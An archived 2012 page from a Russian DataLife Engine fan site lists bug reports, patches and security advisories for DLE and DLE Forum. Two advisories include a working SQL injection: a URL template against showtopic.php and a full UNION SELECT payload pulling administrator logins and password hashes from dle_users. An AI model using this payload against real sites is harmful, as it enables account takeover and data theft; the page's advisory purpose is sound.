This version of the page http://dle.in.ua/bags/ (0.0.0.0) stored by archive.org.ua. It represents a snapshot of the page as of 2012-03-23. The original page over time could change.
Баги » Dle.in.ua - официальный сайт
Сделать домашней|Добавить в избранное
  • Войти
  • Регистрация
  • Забыли пароль?
 
 
dle.in.ua » Баги
  • ▪ Радел форума
  • Тема
  • Автор
  • Ответов |
  • Посл. ответ
  • Обсуждение скрипта
  • Проблемы с установкой
  • evk
  • 15 0
  • Вчера, 22:04
  • Обсуждение скрипта
  • RSS для Яндекс Новости
  • Nashgorod
  • 27 0
  • Вчера, 13:32
  • Моды, Хаки, Локализаторы, Советы
  • DLE 9.5 + VOC++ Чат
  • _Sergey_
  • 17 0
  • Вчера, 08:30
  • Моды, Хаки, Локализаторы, Советы
  • Enter
  • nomit
  • 151 0
  • Вчера, 01:01
  • Обсуждение скрипта
  • Что за ошибки?
  • evk
  • 41 0
  • 22:04, 21.03.2012
  • В помощь вебмастеру
  • Проблема с отображением новостей
  • Горбушка
  • 22 1
  • 14:27, 04.03.2012
  • В помощь вебмастеру
  • проблема отображения сайта на ДЛЕ
  • Горбушка
  • 27 1
  • 08:56, 04.03.2012
  • Моды, Хаки, Локализаторы, Советы
  • Удалить все страницы c fullstory
  • Горбушка
  • 19 1
  • 08:54, 04.03.2012
  • Моды, Хаки, Локализаторы, Советы
  • Сквозной баннер везде кроме главной
  • Горбушка
  • 17 1
  • 08:51, 04.03.2012
Сортировать статьи по: дате | популярности | посещаемости | комментариям | алфавиту

Недостаточная фильтрация в модуле Переходы от 10.09.2011

Автор: NoSay от 13-09-2011, 18:33

Ошибка в версии: все версии
Степень опасности: Высокая

Патч WYSIWYG редактора для DataLife Engine v.9.3

Автор: Corsair от 25-05-2011, 22:46
Уважаемые пользователи,

Новая версия DataLife Engine v.9.3 была предоставлена с WYSIWYG редактором новейшей версии TinyMCE 3.4.2, к сожалению данную версию редактора нельзя назвать стабильной, и в нем были обнаружены следующие проблемы:

1. Невозможность использования горячих клавиш Ctrl-V для вставки текста в браузере Опера 11.xx
2. Некорректная массовая вставка загруженных картинок на сервер.

Исправление бага с русскими никами в Online 5.0

Автор: Kuzia от 27-12-2010, 06:04
Исправление бага с русскими никами при переходе к профилю

Защита папок скрипта от запуска сторонних скриптов

Автор: Baggio от 26-10-2010, 16:26
Дорогие друзья,

в этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер? При обнаружении какой либо уязвимости в скрипте, или сторонних модулях, или вообще при наличии других уязвимых сторонних скриптов на сервере, или серверного ПО. Главная особенность заключается в том, что шеллы можно залить не в любые папки на сервере, а лишь в папки доступные для записи на сервере, и в DataLife Engine такими папками являются папки /uploads/ и /templates/, а также все вложенные в них папки. Данные папки должны иметь права на запись, т.к. вы в них заливаете посредством скрипта легальный контент, файлы, картинки, редактируете в админпанели шаблоны и прочее. И как правило в эти папки производится загрузка шеллов при обнаружении злоумышленником какой либо бреши на сервере в любом скрипте, даже не имеющем отношения к DataLife Engine. Можно ли защитить эти папки, в случае попадания в них зловредного PHP файла, ведь нельзя запретить доступ к этим папкам? Можно, и достаточно не сложно.

Недостаточная фильтрация входящих данных

Автор: DImkA от 14-09-2010, 13:50
Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: Все версии

Степень опасности: Высокая

Исправления в DLE Forum 2.5 для корректной работы со смайлами в DLE 9.0

Автор: Skater от 22-08-2010, 18:33

Автор: Skater_1992
Совместимость: DLE Forum 2.x (тестилось на 2.5)
Делаем чтобы смайлы показывались на DLE 9.0

Очередная инъекция в DLE Forum

Автор: stuk от 23-06-2010, 13:20
Описание: sql-инъекция
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
if (intval($tid))
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");


Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]

SQL – инъекция в DLE-Forum 2.4

Автор: stuk от 11-06-2010, 21:31
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,

Баг - получаем список доп. полей

Автор: Lion__ от 9-06-2010, 03:28
Данный баг позволяет просто скачать список доп. полей новостей и юзеров

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая

Нашёл очередной баг: Lion__

Баг - прямой вызов файлов и мусор в папках

Автор: Lion__ от 9-06-2010, 02:42
Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Нашёл очередной баг: Lion__

Недостаточная фильтрация входящих данных

Автор: DEN 007 от 8-06-2010, 03:51
Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.

Ошибка в версии: Все версии

Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)

Как исправить в полной новости...

Проведение атаки межсайтового скриптинга (XSS)

Автор: neoks от 3-06-2010, 19:29
Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера.

Ошибка в версии: 7.x - 8.5

Степень опасности: Низкая

Для исправления скачайте и скопируйте на свой сервер патч: dle7_85_path.zip [3.17 Kb] (cкачиваний: 336)

Данный патч применим ко всем версиям: 7.x - 8.5

Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5

Автор: Macho от 29-04-2010, 14:20


Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 (полная инструкция)

Запускаем DLE Forum 2.5 на DataLife Engine 8.5

Автор: Горбушка от 5-03-2010, 04:02

При установке форума на DataLife Engine 8.5 перестаёт работать быстрый ответ и ещё некоторые AJAX-элементы. Это вызвано серьёзными изменениями в DataLife Engine и переносом AJAX-файлов в другую папку.

Ввиду этого, нам необходимо самим подправить AJAX-файлы DLE Forum'а, чтобы он работал корректно.

Мы предоставляем Вам 2 инструкции: как для установки в папку /forum, так и для поддомена.

фильтруем уязвимость в dle 8.2 и в раних версиях

Автор: nugumanov от 12-02-2010, 18:26

Прочитал на ачате уязвимость с названием "раскрытие путей", долго искал в поисках ответа,что за зверь раскрытие путей
Степень опастности: средняя
Назад Вперед
Наверх
Alado, centroarts, Comments, dle, dle forum, game, graphic, LogicBoard, parser, psd, RealARTs, SlyNet для DLE 9.4, template, Test-Templates, vkvideo, yellow, Исправлена, Превью картинки при загрузке, бесплатно, варез шаблон dle, вывод, действий, дле, красиво, купить, модуль, музыка, новости, ошибки, переходы 9.6 nulled, платные шаблоны, рейтинг, сайты, строительный шаблон на dle, топ, хак, шаблон, шаблон для dle, шаблон для дле, шаблон сайта строительства

Показать все теги
 

Только у нас
dle шаблоны бесплатные
для DataLife

 
  • Главная страница
  • Регистрация
  • Новое на сайте
  • Статистика
  • Форум